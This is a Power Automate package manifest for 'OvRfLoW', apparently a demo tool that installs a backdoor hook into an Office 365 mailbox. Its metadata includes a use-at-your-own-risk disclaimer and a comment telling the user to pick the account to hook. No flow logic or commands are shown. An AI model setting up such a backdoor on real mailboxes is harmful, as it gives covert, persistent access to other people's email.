{"schema":"1.0","details":{"displayName":"OvRfLoW 0.1","description":"OvRfLoW Back Door Office 365 Command Line Tool - Demo. Not responsible for the use of this tool. For use only on accounts that you own and have permission to use. Use at your own Risk. Be smart always use MFA on your O365 environment.","createdTime":"2019-11-04T21:03:56.0068341Z","packageTelemetryId":"704e3ead-d538-4474-b24f-c03322e4495e","creator":"@surbo","sourceEnvironment":"Created by @surbo"},"resources":{"72ae251e-282d-4ff5-918e-78b332cfcd8d":{"type":"Microsoft.Flow/flows","suggestedCreationType":"New","creationType":"Existing, New, Update","details":{"displayName":"OvRfLoW by @surbo"},"configurableBy":"User","hierarchy":"Root","dependsOn":["85b13fe4-3694-4730-a640-1c0c850a487d","5cc150d5-d6cb-4394-86b9-856f45532ef8"]},"85b13fe4-3694-4730-a640-1c0c850a487d":{"id":"/providers/Microsoft.PowerApps/apis/shared_office365","name":"shared_office365","type":"Microsoft.PowerApps/apis","suggestedCreationType":"Existing","details":{"displayName":"Office 365 Outlook","iconUri":"https://connectoricons-prod.azureedge.net/office365/icon_1.0.1278.1753.png"},"configurableBy":"System","hierarchy":"Child","dependsOn":[]},"5cc150d5-d6cb-4394-86b9-856f45532ef8":{"type":"Microsoft.PowerApps/apis/connections","suggestedCreationType":"Existing","creationType":"Existing","details":{"displayName":"your_email@1.com see comments","iconUri":"https://connectoricons-prod.azureedge.net/office365/icon_1.0.1247.1679.png","comment":"Select your email account that you want to put a back door hook into."},"configurableBy":"User","hierarchy":"Child","dependsOn":["85b13fe4-3694-4730-a640-1c0c850a487d"]}}}